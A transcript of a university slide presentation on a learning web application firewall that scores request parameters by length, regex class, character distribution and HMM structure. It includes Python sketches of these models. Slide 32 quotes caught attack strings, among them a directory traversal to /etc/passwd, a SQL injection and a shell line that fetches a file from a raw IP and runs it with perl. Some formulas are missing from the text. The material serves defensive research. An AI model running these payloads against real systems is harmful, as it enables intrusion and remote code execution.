
Learning Web Application Firewall – Benefits and Caveats

Dariusz Pałka, Pedagogical University of Cracow, dpalka@up.krakow.pl; Marek Zachara, University of Science and Technology (AGH), Cracow, mzachara@agh.edu.pl.


Presentation Transcript


  1. Learning Web Application Firewall – Benefits and Caveats Dariusz Pałka, Pedagogical University of Cracow, dpalka@up.krakow.pl; Marek Zachara, University of Science and Technology (AGH), Cracow, mzachara@agh.edu.pl

  2. Outline • Introduction – why we need extra security mechanisms for Web Applications • Learning Web Application Firewall • Implementation • Learning WAF architecture • Data models used • Results • Summary

  3. Introduction • 72% of interviewed companies had their websites/applications hacked during the preceding 24 months. Most successful attacks happen on the application layer (Barracuda Networks) • Web application vulnerabilities outnumber browser/OS vulnerabilities by a ratio of 10:1 (Microsoft Security Intelligence Report) • „More than 13% of all reviewed sites can be completely compromised automatically. About 49% of web applications contain vulnerabilities of high risk level (Urgent and Critical) detected during automatic scanning. However, detailed manual and automated assessment by a white box method allows to detect these high risk level vulnerabilities with the probability reaching 80-96%”. (Web Application Security Consortium)

  4. Introduction Unfortunately, governmental websites and applications are no exception. The access details are available for sale on the black market.

  5. (source: blog.imperva.com)

  6. Web Application Architecture

  7. Common Attack Methods Against Web Applications • Script injections (especially SQL injections) • Parameter tampering • Forceful browsing • Cross-site scripting

  8. Security Levels

  9. Rule-based Web Application Firewalls • Problems (disadvantages) • Difficulties in configuring a WAF • Duplication of protection rules • Constant adjustment of WAF rules

  10. Learning Web Application Firewall Black Box WAF

  11. Learning Patterns • Triggered (supervised) learning (TL) • Benefits: • No need to consider the data retention period size. • No need to store all historical data. • Resistant to attacks targeting its learning process. • Drawbacks: • The learning process must be completed • A WAF must be manually re-trained after changes in the protected application

  12. Learning Patterns • Continuous (unsupervised) learning (CL) • A WAF will only accept parameter values that match recent users' behavior patterns • The firewall may be susceptible to specially engineered attacks that target its learning process

  13. Implementation • WAF is implemented as an Apache Server module • The analysis of incoming POST and GET parameters • Data analysis is conducted on the basis of a multi-model approach, similar to the one presented by Giovanni Vigna (University of California) and Christopher Kruegel (Technical University Vienna)

  14. WAF Architecture (diagram labels: Client, Server, Req. processing, CORE_IN, SSL_IN, HTTP_IN, Request, Data Validator, Data Collector, Model Generator, Data Decryptor / Encryptor, Req. Data Store, Data Models)

  15. Length of Parameter Values Some attack attempts, such as cross-site scripting, directory traversal and buffer overflow, contain long character sequences, which might significantly exceed the number of characters in legitimate requests, and this feature allows for their easy detection.

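  16. Length of Parameter Values • Chebyshev's inequality: $P(|x - E(x)| \geq t) \leq \frac{\mathrm{var}(x)}{t^2}$ where: E(x) – expected value of x, var(x) – variance of x • If: $x = l$ (length of parameter value) and $t = |l_{obs} - E(l)|$, where: $l_{obs}$ – currently observed parameter value length • We obtain: $P(|l - E(l)| \geq |l_{obs} - E(l)|) \leq \frac{\mathrm{var}(l)}{(l_{obs} - E(l))^2}$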
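
The length model can be sketched in a few lines of Python. This is a minimal illustration, not the Apache module described in the slides: the function names `learn_length_model` and `length_probability` are hypothetical, and capping the bound at 1 is an assumption made so that the result can be read as a probability.

```python
from statistics import fmean, pvariance


def learn_length_model(lengths):
    """Return (E(l), var(l)) for the parameter-value lengths seen in training."""
    return fmean(lengths), pvariance(lengths)


def length_probability(observed_length, mean, variance):
    """Chebyshev upper bound on P(|l - E(l)| >= |l_obs - E(l)|).

    Assumption: the bound is capped at 1.0, and an observation equal to
    the mean gets probability 1.0 (the bound is undefined for t = 0).
    """
    deviation = abs(observed_length - mean)
    if deviation == 0:
        return 1.0
    return min(1.0, variance / deviation ** 2)


# Example: lengths close to 15 are typical, a 115-character value is not.
mean, variance = learn_length_model([14, 15, 16, 15, 15])
typical = length_probability(16, mean, variance)
suspicious = length_probability(115, mean, variance)
```

A very long value, such as a directory traversal string, lies far from the learned mean and therefore receives a bound close to zero.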

  17. Length of Parameter Values (four panels) • E(l) = 14.97, var(l) = 6.25 • E(l) = 15.06, var(l) = 5.99 • E(l) = 17.71, var(l) = 124.66 • E(l) = 15.15, var(l) = 13.02

  18. Length of Parameter Values If and Attacks cannot be detected

  19. Belonging to Predefined Classes Examples of classes of parameter values defined with the use of regular expressions: • A whole number with or without a sign (e.g. 123, +56, -78) ^[+-]?(0)|([1-9]\d*)$ • A dot separated real number (e.g. 123, 12.3, .3) ^([0-9]+\.[0-9]*)|([0-9]*\.[0-9]+)|([0-9]+)$ • A comma separated real number ^([0-9]+,[0-9]*)|([0-9]*,[0-9]+)|([0-9]+)$ • An email address (e.g. somebody@example.org) ^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$ • The US currency (e.g. $0.59, $1050, $2,596.99) ^\$(\d{1,3}(\,\d{3})*|(\d+))(\.\d{2})?$ • Http(s) URL (e.g. http://example.org, https://example.org/test/abc) ^https?\://[a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,3}(/\S*)*$ • One word ^[a-zA-Z]+$ • A simple text ^[a-zA-Z0-9.!?,;”’- \t\n]+$

  20. Belonging to Predefined Classes • Learning • If all values from a learning set belong to the k-th regular expression class, this class is added to set C (parameter constraints set) • Testing • The observed value is tested for membership in the classes from set C; the number of classes to which the observed value belongs is i
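
The learning and testing steps for predefined classes can be sketched as follows. This is a hedged illustration: the `CLASSES` table holds only three of the classes, its patterns are adapted rather than copied (the alternation is grouped and `fullmatch` replaces the `^...$` anchors so that every branch must cover the whole value), and the names `learn_constraints` and `count_matching` are hypothetical.

```python
import re

# Hypothetical class table. Patterns are adapted from the slide examples:
# fullmatch() is used instead of ^...$ so each alternative spans the value.
CLASSES = {
    "integer": re.compile(r"[+-]?(0|[1-9]\d*)"),
    "dot_real": re.compile(r"[0-9]+\.[0-9]*|[0-9]*\.[0-9]+|[0-9]+"),
    "word": re.compile(r"[a-zA-Z]+"),
}


def learn_constraints(training_values):
    """Return set C: the classes that every training value belongs to."""
    return {
        name
        for name, pattern in CLASSES.items()
        if all(pattern.fullmatch(value) for value in training_values)
    }


def count_matching(value, constraints):
    """Return i: the number of classes in C that the observed value matches."""
    return sum(1 for name in constraints if CLASSES[name].fullmatch(value))


# Example: a numeric parameter learns two classes; an injection matches none.
constraints = learn_constraints(["12", "7", "305"])
normal_hits = count_matching("42", constraints)
attack_hits = count_matching("1 or 1=1", constraints)
```

How the count i is turned into a probability is not shown here, since it depends on the scoring formula chosen for this model.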

  21. The Character Distribution • For every character in parameter values (from a learning set) we calculate the expected value and the variance of its relative frequency • (relative character frequency in i-th parameter value) = number of occurrences of the character in i-th parameter value / length of i-th parameter value
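
The learning step of the character distribution model can be sketched as below. This is a minimal illustration under stated assumptions: the function names are hypothetical, empty parameter values are skipped because their relative frequencies are undefined, and a character absent from a value contributes a frequency of 0 for that value.

```python
from collections import Counter
from statistics import fmean, pvariance


def relative_frequencies(value):
    """Map each character to (number of occurrences) / (length of value)."""
    counts = Counter(value)
    return {char: count / len(value) for char, count in counts.items()}


def learn_character_model(values):
    """Map each character to (expected value, variance) of its relative frequency.

    Assumption: empty values are ignored, and a character missing from a
    value counts as relative frequency 0.0 for that value.
    """
    per_value = [relative_frequencies(value) for value in values if value]
    alphabet = set().union(*per_value)
    model = {}
    for char in alphabet:
        frequencies = [freq.get(char, 0.0) for freq in per_value]
        model[char] = (fmean(frequencies), pvariance(frequencies))
    return model


# Example: 'a' has relative frequency 2/3 in "aab" and 1/2 in "ab".
model = learn_character_model(["aab", "ab"])
mean_a, variance_a = model["a"]
```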

  22. The Character Distribution

  23. The Character Distribution

  24. The Character Distribution • Testing • for every character:

  25. Parameter Structural Inference • Structural inference may help if the simple models described earlier are not sufficient • In this approach the structure of legitimate parameter values is modelled as a regular language • We use a Hidden Markov Model to describe this regular language

  26. Ergodic HMM

  27. Parameter Structural Inference • Definitions • $O^{(k)} = O^{(k)}_1 O^{(k)}_2 \dots O^{(k)}_N$ – k-th observation sequence • λ = (A, B, π) – HMM model • Learning - adjusting the model parameters λ to maximize the likelihood P(O|λ) • Baum-Welch algorithm (finds a local maximum of the likelihood function) • Generating k HMMs with a number of states from 2 to sqrt(N), where N is the number of characters in the longest observation sequence • A, B and π matrices are randomly initialised • The HMM with max(

  28. Parameter Structural Inference • Testing • $O_{obs} = O_1 O_2 \dots O_N$ – observation sequence (from incoming requests) • Calculate $P(O_{obs}|\lambda)$ using the Forward-Backward Procedure ()
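
The testing step can be sketched with the forward pass alone, which is sufficient to obtain the likelihood of an observation sequence under a discrete HMM λ = (A, B, π). This is a minimal pure-Python sketch: the function name and the data layout (lists for π and A, one emission dictionary per state for B) are assumptions, and no scaling is applied, so very long sequences may underflow.

```python
def forward_probability(observations, pi, A, B):
    """Return P(O | lambda) for a discrete HMM lambda = (A, B, pi).

    pi[i]   -- probability of starting in state i
    A[i][j] -- probability of a transition from state i to state j
    B[i]    -- dict mapping a symbol to its emission probability in state i
    Symbols missing from B[i] are treated as having probability 0.0.
    """
    if not observations:
        return 1.0  # the empty sequence is generated with certainty
    states = range(len(pi))
    # Initialisation: alpha_1(i) = pi_i * b_i(O_1)
    alpha = [pi[i] * B[i].get(observations[0], 0.0) for i in states]
    # Induction: alpha_{t+1}(j) = (sum_i alpha_t(i) * a_ij) * b_j(O_{t+1})
    for symbol in observations[1:]:
        alpha = [
            sum(alpha[i] * A[i][j] for i in states) * B[j].get(symbol, 0.0)
            for j in states
        ]
    # Termination: P(O | lambda) = sum_i alpha_N(i)
    return sum(alpha)


# Example: a two-state model that alternates between a letter and a digit.
pi = [1.0, 0.0]
A = [[0.0, 1.0], [1.0, 0.0]]
B = [{"a": 1.0}, {"1": 1.0}]
legitimate = forward_probability("a1a", pi, A, B)
anomalous = forward_probability("aa", pi, A, B)
```

In the toy model, a value that follows the learned structure gets a likelihood of 1, while a value that breaks it gets 0.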

  29. Anomaly Detection • After defining particular models, we can determine the anomaly score for an observed parameter value, where: - probability of an observed parameter value for a given model m; n – number of models
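
One plausible way to combine the per-model probabilities into a single score is sketched below. The combination rule is an assumption and not necessarily the formula used by the authors: it takes the unweighted mean of (1 - p_m) over the n models, so that 0 means every model considers the value normal and 1 means every model considers it anomalous. The function name is hypothetical.

```python
def anomaly_score(probabilities):
    """Return the mean of (1 - p_m) over the n per-model probabilities.

    Assumption: all models carry equal weight. Each p_m must lie in [0, 1].
    """
    if not probabilities:
        raise ValueError("at least one model probability is required")
    for p in probabilities:
        if not 0.0 <= p <= 1.0:
            raise ValueError("probabilities must lie in [0, 1]")
    return sum(1.0 - p for p in probabilities) / len(probabilities)


# Example: the length model rejects the value, the class model is undecided.
score = anomaly_score([0.0, 0.5])
```

A request would then be flagged when the score exceeds a threshold chosen by the operator; the threshold is likewise outside what the slides specify.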

  30. Results • Dataset • 3 independent production Web servers • 10 web applications in total • 3853 parameters analysed, with a total of 527070 values • Attack queries • 73 queries collected from our Web servers • 12 queries selected from the „HTTP-delivered attacks against web servers” database (http://www.i-pi.com/HTTP-attacks-JoCN-2006/)

  31. Results

  32. Types of Attacks Found by WAF • Examples of attack attempts found by our Learning WAF (in parameter values): • ../../../../../../../../../../../../../../../../../../../../../../../etc/passwd (Directory Traversal) • phpinfo(); (Parameter Tampering) • ' or 1=1 -- (SQL Injection) • //phpMyAdmin2/config/config.inc.php (Forceful Browsing) • /../../winnt/system32/logfiles/w3svc1/ex000121.log • cd /tmp;rm -rf font-nix;wget 67.58.79.162/font-nix;perl font-nix

  33. Summary • Benefits of a Learning WAF • Can be easily extended with new Data Models to improve security • Requires minimal configuration effort • Can be a supplement for existing security systems • Still TO DO… • Add data models that take into consideration correlations between parameters in a request (not to treat each parameter as a single one) • Improve structural inference (the B-W algorithm in its current form is time-consuming, which may be a problem in production environments with high traffic) • Improve support for a request context (e.g. try to detect and utilise session IDs)

  34. THANK YOU
